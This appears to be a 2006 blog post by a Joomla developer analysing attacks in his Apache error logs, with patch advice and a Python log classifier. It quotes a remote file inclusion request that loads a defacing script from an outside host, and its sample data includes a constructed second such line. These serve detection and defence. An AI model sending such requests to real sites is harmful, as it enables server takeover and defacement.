Hackers are using scripts to hack my page...
Thursday, 17 August 2006 21:38

I've already tried to reduce the attack surface of my homepage by removing all unneeded components, modules and mambots, but here is what I found in the log files...

Hackers trying remote code injection (remote file inclusion)

The following line was found more than once in the Apache error.log:

[Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0

Remember: you should update the following components to their latest versions ASAP:
  • com_securityimages: versions below 3.0.5 are affected; use 3.0.6 or later
  • com_hashcash: versions below 1.2.1 are affected; use 1.2.2 or later
  • com_bayesiannaivefilter was developed but never released as a component; it is still available in the Joomla forge developer tree.
The request above abuses the mosConfig_absolute_path parameter: lang.php uses that variable to build an include path, so when PHP's allow_url_fopen is on (and, typically, register_globals lets a query parameter set the variable), a value that is a URL makes PHP download and execute the remote file. Here that file is http://recon.reschat.dk/images/gallery/tool25.txt, and the trailing ?cmd=id is the first command the tool is told to run. Note that Apache logged this particular request in error.log only because the request line has no leading slash and was rejected as an invalid URI; a well-formed attempt reaches PHP and shows up in access.log instead. If you fetch the script, you'll find that it is plain readable PHP and starts with the header:
Defacing Tool 2.0 by xxxxxx
"Defacing Tool 2.0" is a suite of PHP-based scripts that lets the attacker send commands to the server, primarily with the intent of defacing websites.

Solutions:
  1. For com_bayesiannaivefilter, sorry guys, but I do not have this plugin, and it has never been released in the wild. For com_securityimages or com_hashcash, just upgrade!
  2. If you manage a web host that you are certain does not need remote includes, you can disable that functionality in your php.ini (usually /etc/php.ini) by setting: allow_url_fopen = Off
     Be aware that this also stops fopen()/file_get_contents() on URLs, which some components rely on; that from PHP 5.2 onwards include/require of URLs is controlled by the separate allow_url_include setting, which is Off by default; and that it does nothing against local file inclusion, so upgrading the vulnerable component is still required.
Hackers trying to access well-known PHP files

Each of the lines below appeared more than 500 times in a single day:

[Fri Aug 11 19:11:50 2006] [error] [client 221.87.148.77] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/
[Mon Jul 31 13:07:12 2006] [error] [client 85.108.201.139] user  not found: /administrator/components/com_bayesiannaivefilter/lang.php
[Mon Jul 31 13:07:19 2006] [error] [client 85.108.201.139] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
[Sat Feb 18 21:44:47 2006] [error] [client 80.218.20.20] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan

Hackers trying to access files that do not exist
  • /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/com_hashcash
  • wiki/administrator/
  • [Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_uhp/uhp_config.php
  • [Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_colophon/admin.colophon.php
  • [Mon Jul 31 20:11:25 2006] [error] [client 88.233.220.125] user  not found: /administrator/components/com_mgm/help.mgm.php
These look like automated scanners working through a list of paths belonging to components with well-known vulnerabilities; the same IP hitting several component paths minutes apart is the giveaway.

Some strange attempts (the _vti_bin and MSOffice paths are probes for Microsoft FrontPage Server Extensions and Office web folders, which have nothing to do with Joomla)...

[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
[Mon Jul 31 16:58:44 2006] [error] [client 207.46.98.40] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen
[Fri Jul 28 23:04:35 2006] [error] [client 85.103.107.26] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/path=attacker-example.com
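The RFI request shown earlier and the path-probing scanners in the sections above can be picked out of error.log mechanically rather than by eye. The script below is an added example of that detection logic, written for this page; it is not code from the original post or from Joomla. It assumes the 2006-era Apache error_log layout "[date] [level] [client IP] message", a few probe signatures I derived from the quoted lines, and a sample list made of lines quoted in the post plus one constructed RFI line (marked in the code); the threshold and category names are my own choices.

```python
"""Classify Apache error_log lines by attack type and flag noisy client IPs.

Added example, not code from the post or from Joomla. Assumptions: the
2006-era Apache error_log layout "[date] [level] [client IP] message" and
the probe signatures below, derived from the lines quoted in the post.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

ERROR_LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[\d.]+)\] (?P<msg>.*)$"
)
# Apache logs the whole request line when the URI has no leading "/";
# the RFI attempt quoted in the post is one of those rejected requests.
REQUEST_LINE = re.compile(r"Invalid URI in request \w+ (?P<uri>\S+) HTTP/\d\.\d")
REMOTE_URL = re.compile(r"^\[?(?P<url>(?:https?|ftp)://\S+)$", re.IGNORECASE)
COMPONENT = re.compile(r"/components/(?P<name>com_[A-Za-z0-9_.-]+)/")
FRONTPAGE = re.compile(r"/(?P<name>_vti_bin|_vti_pvt|_vti_cnf|MSOffice)(?:/|$)")


def parse_line(line):
    """Split one error_log line into its fields, or None if it does not fit."""
    m = ERROR_LINE.match(line.strip())
    return m.groupdict() if m else None


def find_rfi(uri):
    """Return (param, remote_url, cmd) if a query parameter carries a URL, else None."""
    _, _, query = uri.partition("?")
    for param, value in parse_qsl(query, keep_blank_values=True):
        m = REMOTE_URL.match(value)
        if not m:
            continue
        remote = m.group("url")
        # The included script usually takes its own command in its query
        # string (.../tool25.txt?cmd=id); pull that out for the analyst.
        remote_query = dict(parse_qsl(urlsplit(remote).query))
        return param, remote.partition("?")[0], remote_query.get("cmd")
    return None


def classify(msg):
    """Return (category, detail) for one error_log message."""
    req = REQUEST_LINE.search(msg)
    if req:
        hit = find_rfi(req.group("uri"))
        if hit:
            param, url, cmd = hit
            return "rfi", {"param": param, "url": url, "cmd": cmd}
    comp = COMPONENT.search(msg)
    if comp:
        return "component_probe", comp.group("name")
    fp = FRONTPAGE.search(msg)
    if fp:
        return "frontpage_probe", fp.group("name")
    return "other", None


def summarize(lines):
    """Aggregate per client IP: number of events and the categories seen."""
    per_ip = defaultdict(lambda: {"events": 0, "categories": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        category, _ = classify(rec["msg"])
        per_ip[rec["ip"]]["events"] += 1
        per_ip[rec["ip"]]["categories"].add(category)
    return dict(per_ip)


def scanners(lines, threshold=3):
    """IPs worth blocking: any RFI attempt, or at least `threshold` probe events."""
    flagged = []
    for ip, info in summarize(lines).items():
        probes = info["categories"] & {"component_probe", "frontpage_probe"}
        if "rfi" in info["categories"] or (probes and info["events"] >= threshold):
            flagged.append(ip)
    return sorted(flagged)


# Lines quoted in the post, plus one constructed RFI line (marked below).
SAMPLE = [
    "[Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0",
    "[Fri Aug 11 19:11:50 2006] [error] [client 221.87.148.77] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/",
    "[Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_uhp/uhp_config.php",
    "[Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_colophon/admin.colophon.php",
    "[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice",
    "[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin",
    "[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice",
    "[Mon Jul 31 16:58:44 2006] [error] [client 207.46.98.40] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen",
    # constructed line, not from the post: a second RFI attempt from another host
    "[Thu Aug 17 18:02:11 2006] [error] [client 192.0.2.10] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://198.51.100.7/x.txt?cmd=uname HTTP/1.0",
]

if __name__ == "__main__":
    for ip, info in sorted(summarize(SAMPLE).items()):
        print(ip, info["events"], sorted(info["categories"]))
    print("block:", scanners(SAMPLE))
```

Run it over a real error.log with `summarize(open("error.log"))` and feed `scanners(...)` to whatever blocklist you already use (the mod_evasive blacklist mentioned in the comments, or a firewall rule). The single-hit threshold for "rfi" is deliberate: one remote-include attempt is enough evidence, while probe counts need a threshold so that a crawler following one dead link is not blocked.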

Comments
messy
Guest (84.74.93.xxx) 2006-08-24 21:29:21

Switching allow_url_fopen = Off does come with some side effects though: some
components won't work and, AFAIK, it brings some Joomla cache problems.
The best thing to do, AFAIK, is to keep everything up to date and read the Joomla forum,
the security one; the .htaccess part is very good and easy to do for
anyone.

You make some great add-ons for Joomla, Cedric, but, no offence, your
website is very chaotic and half of it isn't working, so maybe this is partly
due to you being under attack. Chaos usually means there must be loose
ends.

But as I said before, you're a credit to Joomla development, and I
really appreciate and admire your work!

-------- Cedric Walter --------
A lot of IPs currently get blacklisted by mod_evasive, spamd processes are killing my
server CPU (SpamAssassin processes), I have port scans and a lot of things which
have nothing to do with Joomla and the number of patches I can apply. It seems
some hac...

Last Updated ( Thursday, 17 August 2006 21:47 )